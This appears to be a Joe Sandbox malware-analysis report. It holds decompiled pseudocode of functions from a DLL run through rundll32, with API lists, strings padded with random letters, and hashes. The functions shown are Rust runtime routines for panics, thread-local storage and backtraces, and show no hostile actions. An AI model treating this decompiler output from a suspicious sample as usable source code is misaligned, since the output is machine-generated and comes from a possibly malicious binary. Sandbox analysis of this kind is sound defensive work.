												HeapFree( *0x6ed1e128, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6ed1e110;
											 *0x6ed1e110 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6ecd3290
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
												_t199 = _v40(_v36);
												_t336 = _t336 + 4;
												__eflags = _t312 ^ 0xe43a67d8 | _t199 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L62;
												}
												_t251 = _v36;
												_t276 =  *_t251;
												_t201 = _t251[2];
												goto L21;
											}
											_t252 = _v36;
											_t276 =  *_t252;
											_t201 = _t252[1];
											goto L21;
										}
										_t267 = 1;
										_t332 = 3;
										goto L84;
									}
									__eflags = _t326 - 1;
									if(_t326 != 1) {
										goto L83;
									}
									__eflags =  *_t248 - 0x30;
									if( *_t248 != 0x30) {
										goto L83;
									}
									_t267 = 4;
									_t332 = 1;
									goto L84;
								}
								_t204 = GetProcessHeap();
								__eflags = _t204;
								if(__eflags == 0) {
									goto L67;
								}
								 *0x6ed1e128 = _t204;
								goto L66;
							} else {
								_t332 = _t194;
								__eflags = _t194 - 1;
								if(_t194 != 1) {
									L75:
									_t277 =  *(_t332 + 8);
									__eflags =  *_t332;
									_t136 = _t332 + 4; // 0x4
									_t330 = _t136;
									 *_t332 = 1;
									 *(_t332 + 4) = 0;
									 *(_t332 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t277;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t194 = E6ECCC640(_t277);
											}
										}
									}
									goto L26;
								}
								_v84 = 0;
								_v36 = 0;
								_t210 = 0;
								__eflags = 0;
								goto L47;
							}
						} else {
							_t330 = _t194;
							if( *_t194 != 1) {
								goto L42;
							}
							_t330 = _t330 + 4;
							L26:
							if( *_t330 != 0) {
								E6ECE95A0(_t264, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed0f860, 0x6ed0ff30);
								_t336 = _t336 + 0xc;
								goto L61;
							}
							 *_t330 = 0xffffffff;
							_t332 =  *(_t330 + 4);
							if(_t332 == 0) {
								_v36 = _t330;
								_v20 = 8;
								_t247 = E6ECCC4D0(_t264, _t330, _t332);
								_t330 = _v36;
								_t332 = _t247;
								_t194 =  *(_t330 + 4);
								_t347 = _t194;
								if(_t347 != 0) {
									asm("lock dec dword [eax]");
									if(_t347 == 0) {
										_t280 =  *(_t330 + 4);
										_t194 = E6ECCC640(_t280);
									}
								}
								 *(_t330 + 4) = _t332;
							}
							asm("lock inc dword [esi]");
							if(_t347 <= 0) {
								L16:
								asm("ud2");
								asm("ud2");
								goto L17;
							} else {
								 *_t330 =  *_t330 + 1;
								_v84 = _t332;
								_v36 = _t332;
								if(_t332 != 0) {
									_t209 =  *(_t332 + 0x10);
									__eflags = _t209;
									_t280 =  ==  ? _t209 : _t332 + 0x10;
									if(__eflags != 0) {
										L103:
										_t210 =  *_t280;
										_t280 =  *((intOrPtr*)(_t280 + 4)) - 1;
										L104:
										_v20 = 3;
										L47:
										_v124 = 0x6ed1010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t317 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t212 =  !=  ? _t280 : 9;
										_v80 =  !=  ? _t210 : "<unnamed>thread \'\' panicked at \'\', ";
										_t318 =  &_v124;
										_v76 =  !=  ? _t280 : 9;
										_v68 =  &_v80;
										_v64 = 0x6eccdca0;
										_v60 =  &_v100;
										_v56 = 0x6eccdca0;
										_v52 =  &_v148;
										_v48 = E6ECCDCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECCD0F0( &_v92, _t210) == 3) {
											_v20 = 7;
											_v40 = _t318;
											 *((intOrPtr*)( *((intOrPtr*)(_t318 + 4))))( *_t318);
											_t336 = _t336 + 4;
											_t335 = _v40;
											_t295 =  *((intOrPtr*)(_t335 + 4));
											if( *((intOrPtr*)(_t295 + 4)) != 0) {
												_t245 =  *_t335;
												if( *((intOrPtr*)(_t295 + 8)) >= 9) {
													_t245 =  *(_t245 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t245);
											}
											HeapFree( *0x6ed1e128, 0, _t335);
										}
										_t265 = _v128;
										_t219 =  <  ? (_t265 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t219 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed1e10c);
											_v68 = 0x6ed0fad0;
											_v64 = 1;
											_v152 = 0x6ed1e10c;
											_v41 = _t265;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECCDD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t222 = E6ECCD0F0( &_v92, __eflags);
											_t333 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed1e10c);
											__eflags = _t222 - 3;
											if(__eflags != 0) {
												goto L94;
											}
											_v20 = 5;
											_v40 = _t333;
											 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
											_t336 = _t336 + 4;
											goto L89;
										} else {
											if(_t219 == 1) {
												L94:
												_t360 = _v36;
												if(_t360 != 0) {
													asm("lock dec dword [eax]");
													if(_t360 == 0) {
														E6ECCC640(_v84);
													}
												}
												_t334 = _v140;
												_t331 = _v136;
												_t361 = _v72;
												if(_t361 != 0) {
													asm("lock dec dword [eax]");
													if(_t361 == 0) {
														E6ECCDA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed1e11c);
												_t362 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed0f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t226 = E6ECCD0F0( &_v80, _t362);
													_v120 =  &_v68;
													_v124 = _t226;
													E6ECCD2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t280 = _t331;
												E6ECCD290(_t280, _t334);
												asm("ud2");
												goto L103;
											}
											 *0x6ed1d040 = 0;
											_t356 =  *0x6ed1d040;
											if( *0x6ed1d040 == 0) {
												goto L94;
											}
											_t324 =  &_v68;
											_v68 = 0x6ed1017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed0f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ECCD0F0( &_v92, _t356) != 3) {
												goto L94;
											}
											_v40 = _t324;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t336 = _t336 + 4;
											L89:
											_t291 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t291 + 4)) != 0) {
												_t235 =  *_v40;
												if( *((intOrPtr*)(_t291 + 8)) >= 9) {
													_t235 =  *(_t235 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t235);
											}
											HeapFree( *0x6ed1e128, 0, _v40);
											goto L94;
										}
									}
									_t210 = 0;
									goto L104;
								}
								_t210 = 0;
								goto L47;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6ECCD000: TlsGetValue.KERNEL32(00000000,00000001,6ECCC746), ref: 6ECCD00B
Part of subcall function 6ECCD000: TlsGetValue.KERNEL32(00000000), ref: 6ECCD043

AcquireSRWLockShared.KERNEL32(6ED1E11C), ref: 6ECCC785
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCC8DC
HeapFree.KERNEL32(00000000,?), ref: 6ECCC8EA
TlsGetValue.KERNEL32(00000000), ref: 6ECCC94D
TlsGetValue.KERNEL32(00000000), ref: 6ECCCA47
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCCB31
HeapFree.KERNEL32(00000000,?), ref: 6ECCCB3F
GetProcessHeap.KERNEL32 ref: 6ECCCC18
HeapAlloc.KERNEL32(00C40000,00000000,00000010), ref: 6ECCCC2B
TlsSetValue.KERNEL32(00000000,00000000,00C40000,00000000,00000010), ref: 6ECCCC9C
HeapFree.KERNEL32(00000000,00000000,00C40000,00000000,00000010), ref: 6ECCCD1D

Strings

already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6ECCCBE1
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECCCC00
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ECCC74D, 6ECCC7C8
full, xrefs: 6ECCCCF8

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Heap$FreeValue$AcquireAllocLockProcessShared
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
API String ID: 2275035175-262129955
Opcode ID: 9c223ed04fe577f2491036b9f1203ffda8451c75e88929fba176c5cad845cc6b
Instruction ID: 87a909733350d9fbd1076e91cd2186660dba27084ea33df4dd1f3540ba06d961
Opcode Fuzzy Hash: 9c223ed04fe577f2491036b9f1203ffda8451c75e88929fba176c5cad845cc6b
Instruction Fuzzy Hash: 401246B0E002198FEB10CFE5C854BDEBBB5BB49704F204569D915AF384EB75A846CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCE4E0, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 135
libraryloadersynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E6ECCE4E0(void* __ebx, void* __edi, void* __esi, char _a8) {
				int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* __ebp;
				void* _t15;
				struct HINSTANCE__* _t20;
				signed int _t21;
				void* _t23;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t30;
				void* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				signed int _t50;
				_Unknown_base(*)()* _t52;
				void* _t59;

				_t48 = __edi;
				_push(__edi);
				_v32 = _t59 - 0x14;
				_v20 = 0xffffffff;
				_v24 = E6ECD39F0;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t35 =  *0x6ed1e124; // 0x0
				if(_t35 == 0) {
					_t15 = CreateMutexA(0, 0, "Local\\RustBacktraceMutex");
					__eflags = _t15;
					if(_t15 == 0) {
						_t54 = 1;
						goto L19;
					} else {
						_t35 = _t15;
						__eflags = 0;
						asm("lock cmpxchg [0x6ed1e124], ebx");
						if(0 != 0) {
							CloseHandle(_t35);
							_t35 = 0;
						}
						goto L1;
					}
				} else {
					L1:
					WaitForSingleObjectEx(_t35, 0xffffffff, 0);
					_t20 =  *0x6ed1e130; // 0x0
					if(_t20 != 0) {
						L3:
						_t54 = 0;
						if( *0x6ed1e164 != 0) {
							goto L19;
						} else {
							_t38 =  *0x6ed1e134; // 0x0
							if(_t38 != 0) {
								L7:
								_t21 =  *_t38();
								_t39 =  *0x6ed1e138; // 0x0
								_t50 = _t21;
								if(_t39 != 0) {
									L10:
									 *_t39(_t50 | 0x00000004);
									_t52 =  *0x6ed1e13c; // 0x0
									if(_t52 != 0) {
										L13:
										_t23 = GetCurrentProcess();
										 *_t52(_t23, 0, 1);
										 *0x6ed1e164 = 1;
										goto L19;
									} else {
										_t25 = GetProcAddress( *0x6ed1e130, "SymInitializeW");
										if(_t25 == 0) {
											_v36 = _t35;
											_v20 = 0;
											E6ECE94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t52, _t54, __eflags, 0x6ed104bc);
											goto L23;
										} else {
											_t52 = _t25;
											 *0x6ed1e13c = _t25;
											goto L13;
										}
									}
								} else {
									_t28 = GetProcAddress( *0x6ed1e130, "SymSetOptions");
									if(_t28 == 0) {
										_v36 = _t35;
										_v20 = 0;
										E6ECE94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t50, _t54, __eflags, 0x6ed104ac);
										goto L23;
									} else {
										_t39 = _t28;
										 *0x6ed1e138 = _t28;
										goto L10;
									}
								}
							} else {
								_t30 = GetProcAddress(_t20, "SymGetOptions");
								if(_t30 == 0) {
									_v36 = _t35;
									_v20 = 0;
									E6ECE94E0(_t35, "called `Option::unwrap()` on a `None` value", 0x2b, _t48, 0, __eflags, 0x6ed1049c);
									L23:
									asm("ud2");
									__eflags =  &_a8;
									return E6ECCE6D0(_v36);
								} else {
									_t38 = _t30;
									 *0x6ed1e134 = _t30;
									goto L7;
								}
							}
						}
					} else {
						_t20 = LoadLibraryA("dbghelp.dll");
						 *0x6ed1e130 = _t20;
						if(_t20 == 0) {
							ReleaseMutex(_t35);
							_t54 = 1;
							L19:
							 *[fs:0x0] = _v28;
							return _t54;
						} else {
							goto L3;
						}
					}
				}
			}

APIs

WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE520
LoadLibraryA.KERNEL32(dbghelp.dll,00000000,000000FF,00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE533
GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 6ECCE564
GetProcAddress.KERNEL32(SymSetOptions), ref: 6ECCE592
GetProcAddress.KERNEL32(SymInitializeW), ref: 6ECCE5C2
GetCurrentProcess.KERNEL32 ref: 6ECCE5D7
CreateMutexA.KERNEL32(00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE5F5
CloseHandle.KERNEL32(00000000,00000000,00000000,Local\RustBacktraceMutex), ref: 6ECCE613

Part of subcall function 6ECCE6D0: ReleaseMutex.KERNEL32(?,6ECCE448), ref: 6ECCE6D1

Strings

SymInitializeW, xrefs: 6ECCE5B7
dbghelp.dll, xrefs: 6ECCE52E
SymGetOptions, xrefs: 6ECCE55E
called `Option::unwrap()` on a `None` value, xrefs: 6ECCE651, 6ECCE674, 6ECCE697
SymSetOptions, xrefs: 6ECCE587
Local\RustBacktraceMutex, xrefs: 6ECCE5EC

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: AddressProc$Mutex$CloseCreateCurrentHandleLibraryLoadObjectProcessReleaseSingleWait
String ID: Local\RustBacktraceMutex$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value$dbghelp.dll
API String ID: 1067696788-3213342004
Opcode ID: b59ac84e1a809e11a25577b59aecd83aaa264a5ffdd9936b281c71a7f02346fd
Instruction ID: 2980c5692c8c1de6bead1e03434ee2b8887427ac9a6fe1c7c1ec0e698a5e9e38
Opcode Fuzzy Hash: b59ac84e1a809e11a25577b59aecd83aaa264a5ffdd9936b281c71a7f02346fd
Instruction Fuzzy Hash: A041E3B1E546058FEB10DFE58C527EA77B9AB46B24F000438E816ABB80FB359446C753

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC6D0, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409
memoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E6ECCC6D0(long _a4, signed int _a8) {
				intOrPtr _v4;
				void* _v20;
				void _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t193;
				void* _t197;
				void _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				char* _t204;
				long _t205;
				long _t206;
				void* _t207;
				void* _t208;
				long _t209;
				void _t212;
				void _t213;
				void* _t222;
				void* _t225;
				long _t229;
				void* _t238;
				void* _t248;
				void* _t250;
				void* _t251;
				char** _t254;
				char** _t255;
				void* _t259;
				void* _t263;
				void _t268;
				char _t269;
				signed char _t271;
				void* _t274;
				void _t275;
				intOrPtr _t278;
				void* _t280;
				char* _t281;
				void _t282;
				void _t285;
				intOrPtr _t296;
				intOrPtr _t300;
				void _t303;
				long _t307;
				intOrPtr _t312;
				void* _t314;
				void* _t315;
				signed int _t316;
				signed int _t318;
				void* _t324;
				intOrPtr* _t330;
				long _t332;
				void* _t333;
				void* _t337;
				void _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				void* _t343;
				void _t346;
				void* _t347;
				void* _t348;
				void* _t359;
				void* _t372;
				long _t373;

				 *_t346 = _t274;
				_v4 = _t312;
				_t275 = _t346;
				_push(_a4);
				_push(0);
				L1();
				_t347 = _t346 + 8;
				asm("ud2");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t348 = _t347 - 0x88;
				_v40 = _t348;
				_v28 = 0xffffffff;
				_v32 = E6ECD39A0;
				_t268 = _t275;
				_t340 = 1;
				_t337 = 0x6ed101dc;
				_v36 =  *[fs:0x0];
				 *[fs:0x0] =  &_v36;
				asm("lock xadd [0x6ed1e120], esi");
				_t193 = E6ECCD000(_t268, 0x6ed101dc);
				_t349 = _t193;
				if(_t193 == 0) {
					_t193 = E6ECE95A0(_t268,  &M6ED0F8F7, 0x46, _t349,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
					_t348 = _t348 + 0xc;
					asm("ud2");
				}
				_t314 = _a8;
				_t278 =  *_t193 + 1;
				 *_t193 = _t278;
				if(_t340 < 0 || _t278 >= 3) {
					__eflags = _t278 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6ed0f570;
						_v120 = 0x6ed0f824;
						_v68 = 0x6ed10260;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6ECC2470;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6ECCD0F0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6ed1e128, 0, _t259);
							}
							_t197 = HeapFree( *0x6ed1e128, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6ed10224;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6ed0f570;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6ECCD0F0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6ed1e11c);
					_v144 = 0x6ed1e11c;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6ECCD000(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6ed1e110; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6ECCD380(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6ECE95A0(_t268,  &M6ED0F8F7, 0x46, _t352,  &_v68, 0x6ed0f870, 0x6ed0f9bc);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6ed1d044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6ed1d044;
							_t205 = E6ECD2960(_t268, 0x6ed1d044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6ed1d044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6ed1d044;
								_t206 = E6ECD2960(_t268, 0x6ed1d044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6ed1e128; // 0xc40000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6ed1d044;
										_t340 = _t208;
										_t209 =  *0x6ed1d044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6ECD2960(_t268, 0x6ed1d044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6ECE92F0(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6ed1e128, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6ed1e110;
											 *0x6ed1e110 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6ecd3290
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6ed1e128 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6ECCC640(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6ECE95A0(_t268, "already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd", 0x10, __eflags,  &_v68, 0x6ed0f860, 0x6ed0ff30);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6ECCC4D0(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6ECCC640(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									__eflags = _t285;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(4 + _t285)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6ed1010c;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6eccdca0;
										_v60 =  &_v100;
										_v56 = 0x6eccdca0;
										_v52 =  &_v148;
										_v48 = E6ECCDCC0;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6ECCD0F0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t248);
											}
											HeapFree( *0x6ed1e128, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											__imp__AcquireSRWLockExclusive(0x6ed1e10c);
											_v68 = 0x6ed0fad0;
											_v64 = 1;
											_v152 = 0x6ed1e10c;
											_v41 = _t269;
											_v60 = 0;
